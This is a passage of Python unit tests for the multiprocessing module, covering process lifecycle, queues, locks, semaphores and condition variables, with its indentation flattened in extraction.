HAS_REDUCTION = False
try:
from multiprocessing.sharedctypes import Value, copy
HAS_SHAREDCTYPES = True
except ImportError:
HAS_SHAREDCTYPES = False
try:
import msvcrt
except ImportError:
msvcrt = None
#
#
#
# Timeout to wait until a process completes
TIMEOUT = 30.0 # seconds
def latin(s):
return s.encode('latin')
def close_queue(queue):
if isinstance(queue, multiprocessing.queues.Queue):
queue.close()
queue.join_thread()
def join_process(process):
# Since multiprocessing.Process has the same API than threading.Thread
# (join() and is_alive(), the support function can be reused
support.join_thread(process, timeout=TIMEOUT)
#
# Constants
#
LOG_LEVEL = util.SUBWARNING
#LOG_LEVEL = logging.DEBUG
DELTA = 0.1
CHECK_TIMINGS = False # making true makes tests take a lot longer
# and can sometimes cause some non-serious
# failures because some calls block a bit
# longer than expected
if CHECK_TIMINGS:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
HAVE_GETVALUE = not getattr(_multiprocessing,
'HAVE_BROKEN_SEM_GETVALUE', False)
WIN32 = (sys.platform == "win32")
from multiprocessing.connection import wait
def wait_for_handle(handle, timeout):
if timeout is not None and timeout < 0.0:
timeout = None
return wait([handle], timeout)
try:
MAXFD = os.sysconf("SC_OPEN_MAX")
except:
MAXFD = 256
# To speed up tests when using the forkserver, we can preload these:
PRELOAD = ['__main__', 'test.test_multiprocessing_forkserver']
#
# Some tests require ctypes
#
try:
from ctypes import Structure, c_int, c_double, c_longlong
except ImportError:
Structure = object
c_int = c_double = c_longlong = None
def check_enough_semaphores():
"""Check that the system supports enough semaphores to run the test."""
# minimum number of semaphores available according to POSIX
nsems_min = 256
try:
nsems = os.sysconf("SC_SEM_NSEMS_MAX")
except (AttributeError, ValueError):
# sysconf not available or setting not available
return
if nsems == -1 or nsems >= nsems_min:
return
raise unittest.SkipTest("The OS doesn't support enough semaphores "
"to run the test (required: %d)." % nsems_min)
#
# Creates a wrapper for a function which records the time it takes to finish
#
class TimingWrapper(object):
def __init__(self, func):
self.func = func
self.elapsed = None
def __call__(self, *args, **kwds):
t = time.time()
try:
return self.func(*args, **kwds)
finally:
self.elapsed = time.time() - t
#
# Base class for test cases
#
class BaseTestCase(object):
ALLOWED_TYPES = ('processes', 'manager', 'threads')
def assertTimingAlmostEqual(self, a, b):
if CHECK_TIMINGS:
self.assertAlmostEqual(a, b, 1)
def assertReturnsIfImplemented(self, value, func, *args):
try:
res = func(*args)
except NotImplementedError:
pass
else:
return self.assertEqual(value, res)
# For the sanity of Windows users, rather than crashing or freezing in
# multiple ways.
def __reduce__(self, *args):
raise NotImplementedError("shouldn't try to pickle a test case")
__reduce_ex__ = __reduce__
#
# Return the value of a semaphore
#
def get_value(self):
try:
return self.get_value()
except AttributeError:
try:
return self._Semaphore__value
except AttributeError:
try:
return self._value
except AttributeError:
raise NotImplementedError
#
# Testcases
#
class DummyCallable:
def __call__(self, q, c):
assert isinstance(c, DummyCallable)
q.put(5)
class _TestProcess(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_current(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current = self.current_process()
authkey = current.authkey
self.assertTrue(current.is_alive())
self.assertTrue(not current.daemon)
self.assertIsInstance(authkey, bytes)
self.assertTrue(len(authkey) > 0)
self.assertEqual(current.ident, os.getpid())
self.assertEqual(current.exitcode, None)
def test_daemon_argument(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# By default uses the current process's daemon flag.
proc0 = self.Process(target=self._test)
self.assertEqual(proc0.daemon, self.current_process().daemon)
proc1 = self.Process(target=self._test, daemon=True)
self.assertTrue(proc1.daemon)
proc2 = self.Process(target=self._test, daemon=False)
self.assertFalse(proc2.daemon)
@classmethod
def _test(cls, q, *args, **kwds):
current = cls.current_process()
q.put(args)
q.put(kwds)
q.put(current.name)
if cls.TYPE != 'threads':
q.put(bytes(current.authkey))
q.put(current.pid)
def test_process(self):
q = self.Queue(1)
e = self.Event()
args = (q, 1, 2)
kwargs = {'hello':23, 'bye':2.54}
name = 'SomeProcess'
p = self.Process(
target=self._test, args=args, kwargs=kwargs, name=name
)
p.daemon = True
current = self.current_process()
if self.TYPE != 'threads':
self.assertEqual(p.authkey, current.authkey)
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.daemon, True)
self.assertNotIn(p, self.active_children())
self.assertTrue(type(self.active_children()) is list)
self.assertEqual(p.exitcode, None)
p.start()
self.assertEqual(p.exitcode, None)
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(q.get(), args[1:])
self.assertEqual(q.get(), kwargs)
self.assertEqual(q.get(), p.name)
if self.TYPE != 'threads':
self.assertEqual(q.get(), current.authkey)
self.assertEqual(q.get(), p.pid)
p.join()
self.assertEqual(p.exitcode, 0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
close_queue(q)
@classmethod
def _sleep_some(cls):
time.sleep(100)
@classmethod
def _test_sleep(cls, delay):
time.sleep(delay)
def _kill_process(self, meth):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
p = self.Process(target=self._sleep_some)
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(p.exitcode, None)
join = TimingWrapper(p.join)
self.assertEqual(join(0), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
self.assertEqual(join(-1), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
# XXX maybe terminating too soon causes the problems on Gentoo...
time.sleep(1)
meth(p)
if hasattr(signal, 'alarm'):
# On the Gentoo buildbot waitpid() often seems to block forever.
# We use alarm() to interrupt it if it blocks for too long.
def handler(*args):
raise RuntimeError('join took too long: %s' % p)
old_handler = signal.signal(signal.SIGALRM, handler)
try:
signal.alarm(10)
self.assertEqual(join(), None)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_handler)
else:
self.assertEqual(join(), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
p.join()
return p.exitcode
def test_terminate(self):
exitcode = self._kill_process(multiprocessing.Process.terminate)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGTERM)
def test_kill(self):
exitcode = self._kill_process(multiprocessing.Process.kill)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGKILL)
def test_cpu_count(self):
try:
cpus = multiprocessing.cpu_count()
except NotImplementedError:
cpus = 1
self.assertTrue(type(cpus) is int)
self.assertTrue(cpus >= 1)
def test_active_children(self):
self.assertEqual(type(self.active_children()), list)
p = self.Process(target=time.sleep, args=(DELTA,))
self.assertNotIn(p, self.active_children())
p.daemon = True
p.start()
self.assertIn(p, self.active_children())
p.join()
self.assertNotIn(p, self.active_children())
@classmethod
def _test_recursion(cls, wconn, id):
wconn.send(id)
if len(id) < 2:
for i in range(2):
p = cls.Process(
target=cls._test_recursion, args=(wconn, id+[i])
)
p.start()
p.join()
def test_recursion(self):
rconn, wconn = self.Pipe(duplex=False)
self._test_recursion(wconn, [])
time.sleep(DELTA)
result = []
while rconn.poll():
result.append(rconn.recv())
expected = [
[],
[0],
[0, 0],
[0, 1],
[1],
[1, 0],
[1, 1]
]
self.assertEqual(result, expected)
@classmethod
def _test_sentinel(cls, event):
event.wait(10.0)
def test_sentinel(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
event = self.Event()
p = self.Process(target=self._test_sentinel, args=(event,))
with self.assertRaises(ValueError):
p.sentinel
p.start()
self.addCleanup(p.join)
sentinel = p.sentinel
self.assertIsInstance(sentinel, int)
self.assertFalse(wait_for_handle(sentinel, timeout=0.0))
event.set()
p.join()
self.assertTrue(wait_for_handle(sentinel, timeout=1))
@classmethod
def _test_close(cls, rc=0, q=None):
if q is not None:
q.get()
sys.exit(rc)
def test_close(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
q = self.Queue()
p = self.Process(target=self._test_close, kwargs={'q': q})
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
# Child is still alive, cannot close
with self.assertRaises(ValueError):
p.close()
q.put(None)
p.join()
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.exitcode, 0)
p.close()
with self.assertRaises(ValueError):
p.is_alive()
with self.assertRaises(ValueError):
p.join()
with self.assertRaises(ValueError):
p.terminate()
p.close()
wr = weakref.ref(p)
del p
gc.collect()
self.assertIs(wr(), None)
close_queue(q)
def test_many_processes(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
N = 5 if sm == 'spawn' else 100
# Try to overwhelm the forkserver loop with events
procs = [self.Process(target=self._test_sleep, args=(0.01,))
for i in range(N)]
for p in procs:
p.start()
for p in procs:
join_process(p)
for p in procs:
self.assertEqual(p.exitcode, 0)
procs = [self.Process(target=self._sleep_some)
for i in range(N)]
for p in procs:
p.start()
time.sleep(0.001) # let the children start...
for p in procs:
p.terminate()
for p in procs:
join_process(p)
if os.name != 'nt':
exitcodes = [-signal.SIGTERM]
if sys.platform == 'darwin':
# bpo-31510: On macOS, killing a freshly started process with
# SIGTERM sometimes kills the process with SIGKILL.
exitcodes.append(-signal.SIGKILL)
for p in procs:
self.assertIn(p.exitcode, exitcodes)
def test_lose_target_ref(self):
c = DummyCallable()
wr = weakref.ref(c)
q = self.Queue()
p = self.Process(target=c, args=(q, c))
del c
p.start()
p.join()
self.assertIs(wr(), None)
self.assertEqual(q.get(), 5)
close_queue(q)
@classmethod
def _test_child_fd_inflation(self, evt, q):
q.put(test.support.fd_count())
evt.wait()
def test_child_fd_inflation(self):
# Number of fds in child processes should not grow with the
# number of running children.
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm == 'fork':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
N = 5
evt = self.Event()
q = self.Queue()
procs = [self.Process(target=self._test_child_fd_inflation, args=(evt, q))
for i in range(N)]
for p in procs:
p.start()
try:
fd_counts = [q.get() for i in range(N)]
self.assertEqual(len(set(fd_counts)), 1, fd_counts)
finally:
evt.set()
for p in procs:
p.join()
close_queue(q)
@classmethod
def _test_wait_for_threads(self, evt):
def func1():
time.sleep(0.5)
evt.set()
def func2():
time.sleep(20)
evt.clear()
threading.Thread(target=func1).start()
threading.Thread(target=func2, daemon=True).start()
def test_wait_for_threads(self):
# A child process should wait for non-daemonic threads to end
# before exiting
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
evt = self.Event()
proc = self.Process(target=self._test_wait_for_threads, args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
@classmethod
def _test_error_on_stdio_flush(self, evt, break_std_streams={}):
for stream_name, action in break_std_streams.items():
if action == 'close':
stream = io.StringIO()
stream.close()
else:
assert action == 'remove'
stream = None
setattr(sys, stream_name, None)
evt.set()
def test_error_on_stdio_flush_1(self):
# Check that Process works with broken standard streams
streams = [io.StringIO(), None]
streams[0].close()
for stream_name in ('stdout', 'stderr'):
for stream in streams:
old_stream = getattr(sys, stream_name)
setattr(sys, stream_name, stream)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
def test_error_on_stdio_flush_2(self):
# Same as test_error_on_stdio_flush_1(), but standard streams are
# broken by the child process
for stream_name in ('stdout', 'stderr'):
for action in ('close', 'remove'):
old_stream = getattr(sys, stream_name)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt, {stream_name: action}))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
@classmethod
def _sleep_and_set_event(self, evt, delay=0.0):
time.sleep(delay)
evt.set()
def check_forkserver_death(self, signum):
# bpo-31308: if the forkserver process has died, we should still
# be able to create and run new Process instances (the forkserver
# is implicitly restarted).
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm != 'forkserver':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
from multiprocessing.forkserver import _forkserver
_forkserver.ensure_running()
# First process sleeps 500 ms
delay = 0.5
evt = self.Event()
proc = self.Process(target=self._sleep_and_set_event, args=(evt, delay))
proc.start()
pid = _forkserver._forkserver_pid
os.kill(pid, signum)
# give time to the fork server to die and time to proc to complete
time.sleep(delay * 2.0)
evt2 = self.Event()
proc2 = self.Process(target=self._sleep_and_set_event, args=(evt2,))
proc2.start()
proc2.join()
self.assertTrue(evt2.is_set())
self.assertEqual(proc2.exitcode, 0)
proc.join()
self.assertTrue(evt.is_set())
self.assertIn(proc.exitcode, (0, 255))
def test_forkserver_sigint(self):
# Catchable signal
self.check_forkserver_death(signal.SIGINT)
def test_forkserver_sigkill(self):
# Uncatchable signal
if os.name != 'nt':
self.check_forkserver_death(signal.SIGKILL)
#
#
#
class _UpperCaser(multiprocessing.Process):
def __init__(self):
multiprocessing.Process.__init__(self)
self.child_conn, self.parent_conn = multiprocessing.Pipe()
def run(self):
self.parent_conn.close()
for s in iter(self.child_conn.recv, None):
self.child_conn.send(s.upper())
self.child_conn.close()
def submit(self, s):
assert type(s) is str
self.parent_conn.send(s)
return self.parent_conn.recv()
def stop(self):
self.parent_conn.send(None)
self.parent_conn.close()
self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_subclassing(self):
uppercaser = _UpperCaser()
uppercaser.daemon = True
uppercaser.start()
self.assertEqual(uppercaser.submit('hello'), 'HELLO')
self.assertEqual(uppercaser.submit('world'), 'WORLD')
uppercaser.stop()
uppercaser.join()
def test_stderr_flush(self):
# sys.stderr is flushed at process shutdown (issue #13812)
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
proc = self.Process(target=self._test_stderr_flush, args=(testfn,))
proc.start()
proc.join()
with open(testfn, 'r') as f:
err = f.read()
# The whole traceback was printed
self.assertIn("ZeroDivisionError", err)
self.assertIn("test_multiprocessing.py", err)
self.assertIn("1/0 # MARKER", err)
@classmethod
def _test_stderr_flush(cls, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
1/0 # MARKER
@classmethod
def _test_sys_exit(cls, reason, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
sys.exit(reason)
def test_sys_exit(self):
# See Issue 13854
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
for reason in (
[1, 2, 3],
'ignore this',
):
p = self.Process(target=self._test_sys_exit, args=(reason, testfn))
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, 1)
with open(testfn, 'r') as f:
content = f.read()
self.assertEqual(content.rstrip(), str(reason))
os.unlink(testfn)
for reason in (True, False, 8):
p = self.Process(target=sys.exit, args=(reason,))
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, reason)
#
#
#
def queue_empty(q):
if hasattr(q, 'empty'):
return q.empty()
else:
return q.qsize() == 0
def queue_full(q, maxsize):
if hasattr(q, 'full'):
return q.full()
else:
return q.qsize() == maxsize
class _TestQueue(BaseTestCase):
@classmethod
def _test_put(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
for i in range(6):
queue.get()
parent_can_continue.set()
def test_put(self):
MAXSIZE = 6
queue = self.Queue(maxsize=MAXSIZE)
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_put,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
queue.put(1)
queue.put(2, True)
queue.put(3, True, None)
queue.put(4, False)
queue.put(5, False, None)
queue.put_nowait(6)
# the values may be in buffer but not yet in pipe so sleep a bit
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
self.assertEqual(queue_full(queue, MAXSIZE), True)
put = TimingWrapper(queue.put)
put_nowait = TimingWrapper(queue.put_nowait)
self.assertRaises(pyqueue.Full, put, 7, False)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, False, None)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put_nowait, 7)
self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, TIMEOUT1)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Full, put, 7, False, TIMEOUT2)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
child_can_start.set()
parent_can_continue.wait()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
proc.join()
close_queue(queue)
@classmethod
def _test_get(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
#queue.put(1)
queue.put(2)
queue.put(3)
queue.put(4)
queue.put(5)
parent_can_continue.set()
def test_get(self):
queue = self.Queue()
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_get,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
child_can_start.set()
parent_can_continue.wait()
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
# Hangs unexpectedly, remove for now
#self.assertEqual(queue.get(), 1)
self.assertEqual(queue.get(True, None), 2)
self.assertEqual(queue.get(True), 3)
self.assertEqual(queue.get(timeout=1), 4)
self.assertEqual(queue.get_nowait(), 5)
self.assertEqual(queue_empty(queue), True)
get = TimingWrapper(queue.get)
get_nowait = TimingWrapper(queue.get_nowait)
self.assertRaises(pyqueue.Empty, get, False)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, False, None)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get_nowait)
self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, True, TIMEOUT1)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Empty, get, False, TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
proc.join()
close_queue(queue)
@classmethod
def _test_fork(cls, queue):
for i in range(10, 20):
queue.put(i)
# note that at this point the items may only be buffered, so the
# process cannot shutdown until the feeder thread has finished
# pushing items onto the pipe.
def test_fork(self):
# Old versions of Queue would fail to create a new feeder
# thread for a forked process if the original process had its
# own feeder thread. This test checks that this no longer
# happens.
queue = self.Queue()
# put items on queue so that main process starts a feeder thread
for i in range(10):
queue.put(i)
# wait to make sure thread starts before we fork a new process
time.sleep(DELTA)
# fork process
p = self.Process(target=self._test_fork, args=(queue,))
p.daemon = True
p.start()
# check that all expected items are in the queue
for i in range(20):
self.assertEqual(queue.get(), i)
self.assertRaises(pyqueue.Empty, queue.get, False)
p.join()
close_queue(queue)
def test_qsize(self):
q = self.Queue()
try:
self.assertEqual(q.qsize(), 0)
except NotImplementedError:
self.skipTest('qsize method not implemented')
q.put(1)
self.assertEqual(q.qsize(), 1)
q.put(5)
self.assertEqual(q.qsize(), 2)
q.get()
self.assertEqual(q.qsize(), 1)
q.get()
self.assertEqual(q.qsize(), 0)
close_queue(q)
@classmethod
def _test_task_done(cls, q):
for obj in iter(q.get, None):
time.sleep(DELTA)
q.task_done()
def test_task_done(self):
queue = self.JoinableQueue()
workers = [self.Process(target=self._test_task_done, args=(queue,))
for i in range(4)]
for p in workers:
p.daemon = True
p.start()
for i in range(10):
queue.put(i)
queue.join()
for p in workers:
queue.put(None)
for p in workers:
p.join()
close_queue(queue)
def test_no_import_lock_contention(self):
with test.support.temp_cwd():
module_name = 'imported_by_an_imported_module'
with open(module_name + '.py', 'w') as f:
f.write("""if 1:
import multiprocessing
q = multiprocessing.Queue()
q.put('knock knock')
q.get(timeout=3)
q.close()
del q
""")
with test.support.DirsOnSysPath(os.getcwd()):
try:
__import__(module_name)
except pyqueue.Empty:
self.fail("Probable regression on import lock contention;"
" see Issue #22853")
def test_timeout(self):
q = multiprocessing.Queue()
start = time.time()
self.assertRaises(pyqueue.Empty, q.get, True, 0.200)
delta = time.time() - start
# bpo-30317: Tolerate a delta of 100 ms because of the bad clock
# resolution on Windows (usually 15.6 ms). x86 Windows7 3.x once
# failed because the delta was only 135.8 ms.
self.assertGreaterEqual(delta, 0.100)
close_queue(q)
def test_queue_feeder_donot_stop_onexc(self):
# bpo-30414: verify feeder handles exceptions correctly
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
def __reduce__(self):
raise AttributeError
with test.support.captured_stderr():
q = self.Queue()
q.put(NotSerializable())
q.put(True)
# bpo-30595: use a timeout of 1 second for slow buildbots
self.assertTrue(q.get(timeout=1.0))
close_queue(q)
with test.support.captured_stderr():
# bpo-33078: verify that the queue size is correctly handled
# on errors.
q = self.Queue(maxsize=1)
q.put(NotSerializable())
q.put(True)
try:
self.assertEqual(q.qsize(), 1)
except NotImplementedError:
# qsize is not available on all platform as it
# relies on sem_getvalue
pass
# bpo-30595: use a timeout of 1 second for slow buildbots
self.assertTrue(q.get(timeout=1.0))
# Check that the size of the queue is correct
self.assertTrue(q.empty())
close_queue(q)
def test_queue_feeder_on_queue_feeder_error(self):
# bpo-30006: verify feeder handles exceptions using the
# _on_queue_feeder_error hook.
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
"""Mock unserializable object"""
def __init__(self):
self.reduce_was_called = False
self.on_queue_feeder_error_was_called = False
def __reduce__(self):
self.reduce_was_called = True
raise AttributeError
class SafeQueue(multiprocessing.queues.Queue):
"""Queue with overloaded _on_queue_feeder_error hook"""
@staticmethod
def _on_queue_feeder_error(e, obj):
if (isinstance(e, AttributeError) and
isinstance(obj, NotSerializable)):
obj.on_queue_feeder_error_was_called = True
not_serializable_obj = NotSerializable()
# The captured_stderr reduces the noise in the test report
with test.support.captured_stderr():
q = SafeQueue(ctx=multiprocessing.get_context())
q.put(not_serializable_obj)
# Verify that q is still functioning correctly
q.put(True)
self.assertTrue(q.get(timeout=1.0))
# Assert that the serialization and the hook have been called correctly
self.assertTrue(not_serializable_obj.reduce_was_called)
self.assertTrue(not_serializable_obj.on_queue_feeder_error_was_called)
#
#
#
class _TestLock(BaseTestCase):
def test_lock(self):
lock = self.Lock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(False), False)
self.assertEqual(lock.release(), None)
self.assertRaises((ValueError, threading.ThreadError), lock.release)
def test_rlock(self):
lock = self.RLock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertRaises((AssertionError, RuntimeError), lock.release)
def test_lock_context(self):
with self.Lock():
pass
class _TestSemaphore(BaseTestCase):
def _test_semaphore(self, sem):
self.assertReturnsIfImplemented(2, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.acquire(False), False)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(2, get_value, sem)
def test_semaphore(self):
sem = self.Semaphore(2)
self._test_semaphore(sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(3, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(4, get_value, sem)
def test_bounded_semaphore(self):
sem = self.BoundedSemaphore(2)
self._test_semaphore(sem)
# Currently fails on OS/X
#if HAVE_GETVALUE:
# self.assertRaises(ValueError, sem.release)
# self.assertReturnsIfImplemented(2, get_value, sem)
def test_timeout(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sem = self.Semaphore(0)
acquire = TimingWrapper(sem.acquire)
self.assertEqual(acquire(False), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, None), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, TIMEOUT1), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0)
self.assertEqual(acquire(True, TIMEOUT2), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
self.assertEqual(acquire(timeout=TIMEOUT3), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
class _TestCondition(BaseTestCase):
@classmethod
def f(cls, cond, sleeping, woken, timeout=None):
cond.acquire()
sleeping.release()
cond.wait(timeout)
woken.release()
cond.release()
def assertReachesEventually(self, func, value):
for i in range(10):
try:
if func() == value:
break
except NotImplementedError:
break
time.sleep(DELTA)
time.sleep(DELTA)
self.assertReturnsIfImplemented(value, func)
def check_invariant(self, cond):
# this is only supposed to succeed when there are no sleepers
if self.TYPE == 'processes':
try:
sleepers = (cond._sleeping_count.get_value() -
cond._woken_count.get_value())
self.assertEqual(sleepers, 0)
self.assertEqual(cond._wait_semaphore.get_value(), 0)
except NotImplementedError:
pass
def test_notify(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
# wait for both children to start sleeping
sleeping.acquire()
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake up one process/thread
cond.acquire()
cond.notify()
cond.release()
# check one process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(1, get_value, woken)
# wake up another
cond.acquire()
cond.notify()
cond.release()
# check other has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(2, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
p.join()
def test_notify_all(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes which will timeout
for i in range(3):
p = self.Process(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them all to sleep
for i in range(6):
sleeping.acquire()
# check they have all timed out
for i in range(6):
woken.acquire()
self.assertReturnsIfImplemented(0, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
# start some more threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake them all up
cond.acquire()
cond.notify_all()
cond.release()
# check they have all woken
self.assertReachesEventually(lambda: get_value(woken), 6)
# check state is not mucked up
self.check_invariant(cond)
def test_notify_n(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake some of them up
cond.acquire()
cond.notify(n=2)
cond.release()
# check 2 have woken
self.assertReachesEventually(lambda: get_value(woken), 2)
# wake the rest of them
cond.acquire()
cond.notify(n=4)
cond.release()
self.assertReachesEventually(lambda: get_value(woken), 6)
# doesn't do anything more
cond.acquire()
cond.notify(n=3)
cond.release()
self.assertReturnsIfImplemented(6, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
def test_timeout(self):
cond = self.Condition()
wait = TimingWrapper(cond.wait)
cond.acquire()
res = wait(TIMEOUT1)
cond.release()
self.assertEqual(res, False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
@classmethod
def _test_waitfor_f(cls, cond, state):
with cond:
state.value = 0
cond.notify()
result = cond.wait_for(lambda : state.value==4)
if not result or state.value != 4:
sys.exit(1)
